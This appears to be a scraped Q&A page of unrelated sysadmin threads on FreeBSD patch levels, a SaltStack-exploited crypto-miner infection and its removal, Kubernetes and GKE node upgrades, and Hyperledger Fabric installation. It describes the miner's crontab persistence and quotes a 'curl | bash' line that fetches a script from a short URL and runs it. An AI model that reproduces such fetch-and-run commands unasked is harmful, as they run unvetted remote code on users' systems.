I have a FreeBSD-system with stating FreeBSD 11.1-RELEASE-p2 and another one stating FreeBSD 11.1-RELEASE-p6.
What does the -p2 and -p6 parts of the version name stand for? Am I guessing right that they stand for patch level?
I there a way to directly upgrade from FreeBSD 11.1-RELEASE-p2 to FreeBSD 11.1-RELEASE-p6 via
% freebsd-update upgrade -r 11.1-RELEASE-p6
Or how else would I do such a minor upgrade?
Correct Your -p2 and -p6 stands for the different security patch levels of your systems. The patch level will be "increased" by running:
freebsd-update fetch install # apply security patches
Talking about minor or major upgrades of FreeBSD: Those are the "product versions", this is where the -RELEASE comes into play. It's always something like [major version].[minor version]-RELEASE.
# minor upgrade if currently running 11.1-RELEASE, major release is still "11"
freebsd-update -r 11.2-RELEASE upgrade
# major upgrade if currently running e.g. 11.x-RELEASE
freebsd-update -r 12.0-RELEASE upgrade
Fore more details see the FreeBSD Handbook/Updates.
Your current version and patch level of FreeBSD can be determined by running
freebsd-version -kru
# installed kernel, running kernel, userland
# those may differ from each other
# see 'man freebsd-version' for more
This is the patch level. You can roughly read it as 11.1.2 and 11.1.6, respectively. These versions differ in security updates, usually.
To install the latest security patches you can use freebsd-update fetch install.
Related
We used to use salt-master to manage about 10 servers, but have stopped now.
One of the servers is now constantly running a salt-minions service which consumes around 140%-160% of the CPU all the time. I kill it, and it just comes back again and again.
I have used apt-get to remove and purge any packages that include salt-*, as well as used dpkg to do the same.. The master salt server is not running. Yet, this instance just keeps smashing itself with this random process that just won't die.
Any assistance is greatly appreciated!
Screenshot of running processes and output from apt-get packages
This looks to be CVE related, and you need to rebuild/redeploy these systems.
Please read both:
SaltStack Blog: Critical Vulnerabilities Update CVE-2020-11651 and CVE-2020-11652
saltexploit.com
Snippet from the CVE blog:
...a critical vulnerability was discovered affecting Salt Master versions 2019.2.3 and 3000.1 and earlier. SaltStack customers and Salt users who have followed fundamental internet security guidelines and best practices are not affected by this vulnerability. The vulnerability is easily exploitable if a Salt Master is exposed to the open internet.
As always, please follow our guidance and secure your Salt infrastructure with the best practices found in this guide: See: Hardening your Salt Environment.
This vulnerability has been rated as critical with a Common Vulnerability Scoring System (CVSS) score of 10.0.
Snippet from saltexploit:
This was a crypto-mining operation
salt minions are affected and as of version 5, masters may be as well
salt-minions is a compiled xmrig binary.
salt-store contains a RAT, nspps, which continues to evolve and become more nasty
Atlassian confirms the newer revisions of the binary are a version of h2miner
Additional information
As a RAT, salt-store is more concerning than salt-minions. More on that later
There have been at least 5 different versions of the salt-store payload, each more advanced than the last.
There are additional backdoors installed, and private keys are getting stolen right and left
Seriously, change out your keys!
Symptoms
very high CPU usage, sometimes only on 1 core, sometimes on all
Fan spin! (Physical hardware only, of course.)
Mysterious process named salt-minions is CPU intensive, stemming from /tmp/salt-minions or /usr/bin/
additional binary in /var/tmp/ or /usr/bin named salt-store or salt-storer
Firewalls disabled
Most applications crashing or taken offline
Your screenshots have shown salt-minions named processes, and high CPU usage, just as described.
It would be a good idea to join the Salt community slack, too: SaltStack Community Slack and take a look at both the #salt-store-miner-public and #security channels.
Check your root's crontab with:
sudo crontab -u root -l
If you see a wget/curl download of a shell script from a random ip, you got the miner.
How to fix it:
Plan A:
Update salt-server
Wipe and reinstall all the servers connected to that master.
Plan B (usually more feasible)
Update salt-server and minions
delete the crontab with sudo crontab -u root -e
kill the salt-store and the salt minion process with kill -9 <pid> <pid> (get the pids with ps faxu)
delete the salt minion fake executable, usually in /tmp/
I formed a k8s cluster with 5 nodes.
I want to run a command on all nodes which equals:
k8s-node1: yum update
k8s-node2: yum update
k8s-node3: yum update
k8s-node4: yum update
k8s-node5: yum update
How to achieve this?
Just as cookiedough mentions. Your question is not Kubernetes related but rather Linux server administration in this case it also should not be asked on StackOverflow as it is for programming related topics.
You can find this question has been asked and answered here. And in similar cases where there is a need to run command or update on multiple machines.
Just making this short you can use lots of tools like ansible, pssh or some script etc.
In case of existing pods on the Node and having a specific need to reboot the Node (for example kernel upgrade, libc upgrade etc.) you can read about this scenario in official documentation - Maintenance on a Node.
We have a fairly large kubernetes deployment on GKE, and we wanted to make our life a little easier by enabling auto-upgrades. The documentation on the topic tells you how to enable it, but not how it actually works.
We enabled the feature on a test cluster, but no nodes were ever upgraded (although the UI kept nagging us that "upgrades are available").
The docs say it would be updated to the "latest stable" version and that it occurs "at regular intervals at the discretion of the GKE team" - both of which is not terribly helpful.
The UI always says: "Next auto-upgrade: Not scheduled"
Has someone used this feature in production and can shed some light on what it'll actually do?
What I did:
I enabled the feature on the nodepools (not the cluster itself)
I set up a maintenance window
Cluster version was 1.11.7-gke.3
Nodepools had version 1.11.5-gke.X
The newest available version was 1.11.7-gke.6
What I expected:
The nodepool would be updated to either 1.11.7-gke.3 (the default cluster version) or 1.11.7-gke.6 (the most recent version)
The update would happen in the next maintenance window
The update would otherwise work like a "manual" update
What actually happened:
Nothing
The nodepools remained on 1.11.5-gke.X for more than a week
My question
Is the nodepool version supposed to update?
If so, at what time?
If so, to what version?
I'll finally answer this myself. The auto-upgrade does work, though it took several days to a week until the version was upgraded.
There is no indication of the planned upgrade date, or any feedback other than the version updating.
It will upgrade to the current master version of the cluster.
Addition: It still doesn't work reliably, and still no way to debug if it doesn't. One information I got was that the mechanism does not work if you initially provided a specific version for the node pool. As it is not possible to deduce the inner workings of the autoupdates, we had to resort to manually checking the status again.
I wanted to share two other possibilities as to why a node-pool may not be auto-upgrading or scheduled to upgrade.
One of our projects was having the similar issue where the master version had auto-upgraded to 1.14.10-gke.27 but our node-pool stayed stuck at 1.14.10-gke.24 for over a month.
Reaching a node quota
The node-pool upgrade might be failing due to a node quota (although I'm not sure the web console would say Next auto-upgrade: Not scheduled). From the node upgrades documentation, it suggests we can run the following to view any failed upgrade operations:
gcloud container operations list --filter="STATUS=DONE AND TYPE=UPGRADE_NODES AND targetLink:https://container.googleapis.com/v1/projects/[PROJECT_ID]/zones/[ZONE]/clusters/[CLUSTER_NAME]"
Automatic node upgrades are for minor+ versions only
After exhausting my troubleshooting steps, I reached out GCP Support and opened a case (Case 23113272 for anyone working at Google). They told me the following:
Automatic node upgrade:
The node version could not necessary upgrade automatically, let me explain, exists three upgrades in a node: Minor versions (1.X), Patch releases (1.X.Y) and Security updates and bug fixes (1.X.Y-gke.N), please take a look at this documentation [2] the automatic node upgrade works from a minor version and in your case the upgrade was a security update that can't upgrade automatically.
I responded back and they confirmed that automatic node upgrades will only happen for minor versions and above. I have requested that they submit a request to update their documentation because (at the time of this response) it is not outlined anywhere in their node auto-upgrade documentation.
This feature replaces the VMs (Kubernetes nodes) in your node pool running the "old" Kubernetes version with VMs running the "new" version.
The node pool "upgrade" operation is done in a rolling fashion: It's not like GKE deletes all your VMs and recreates them simultaneously (except when you have only 1 node in your cluster). By default, the nodes are replaced with newer nodes one-by-one (although this might change).
GKE internally uses mostly the features of managed instance groups to manage operations on node pools.
You can find documentation on how to schedule node upgrades by specifying certain "maintenance windows" so you are impacted minimally. (This article also gives a bit more insights on how upgrades happen.)
That said, you can disable auto-upgrades and upgrade your cluster manually (although this is not recommended). Some GKE users have thousands of nodes, therefore for them, upgrading VMs one-by-one are not feasible.
For that GKE offers an option that lets you choose "how many nodes are upgraded at a time":
gcloud container clusters upgrade \
--concurrent-node-count=CONCURRENT_NODE_COUNT
Documentation of this flag says:
The number of nodes to upgrade concurrently. Valid values are [1, 20]. It is a recommended best practice to set this value to no higher than 3% of your cluster size.'
Is it possible to install kubernetes by kubeadm init command on system has RAM less than 1GB ?I have tried to install but it failed in kubeadm init command.
As mentioned in the installation steps to be taken before you begin, you need to have:
linux compatible system for master and nodes
2GB or more RAM per machine
network connectivity
swap disabled on every node
But going back to your question, It may be possible to run the installation process, but the further usability is not possible. This configuration will be not stable.
is there any way we can get the hyperledger fabric binaries or build those from the source code as our machines are behind the firewalls. I am not able to run
curl -sSL goo.gl/byy2Qj | bash -s 1.0.5
which use the following commands
docker pull hyperledger/fabric-$IMAGES:$FABRIC_TAG
docker tag hyperledger/fabric-$IMAGES:$FABRIC_TAG hyperledger/fabric-$IMAGES
docker hub is blocked and external images are not allowed to download.
I believe this is the issue with most of the enterprises whose systems are behind the firewalls are provided restricted access for docker as well.
Just download the binaries directly for orderer and peers (and configtx, etc.) from this line in the script at goo.gl/byy2Qj. Just browse manually to find your flavor and release.
echo "===> Downloading platform binaries"
curl https://nexus.hyperledger.org/content/repositories/releases/org/hyperledger/fabric/hyperledger-fabric/${ARCH}-${VERSION}/hyperledger-fabric-${ARCH}-${VERSION}.tar.gz | tar xz
You may still have to clone and install the CA server, and install CouchDB, and Postgres, and Kafka and Zookeeper, etc., depending on how you want to set things up.
And you can always clone the main Fabric repo and make the binaries yourself.
You can then run them without docker (note: the cc container needs Docker available, but no images) or modify the docker scripts and create your own containers.
This page in the docs gives some good clues if you want to make yourself. You really only need to make peer and orderer but you can do make dist-clean all. Making all can take 45 min to 1 hour. You don't have to make and run any of the tests. And don't use vagrant.
https://hyperledger-fabric.readthedocs.io/en/release/dev-setup/build.html